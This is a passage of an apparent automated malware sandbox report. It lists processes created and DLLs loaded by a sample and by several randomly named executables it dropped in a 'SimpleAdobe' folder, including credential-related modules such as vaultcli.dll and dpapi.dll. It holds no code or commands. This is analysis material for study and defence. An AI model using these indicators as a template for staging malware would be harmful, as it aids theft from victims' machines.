                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: gpedit.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: activeds.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: dssec.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: dsuiext.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: authz.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: adsldpc.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: adsldpc.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: adsldpc.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fhsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msidle.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fhcfg.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: efsutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncasvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: httpprxp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wpdbusenum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceconnectapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: d3d11.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: dxgi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: d3d10warp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: dxcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: devobj.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: webio.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: schannel.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: slc.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeSection loaded: apphelp.dll
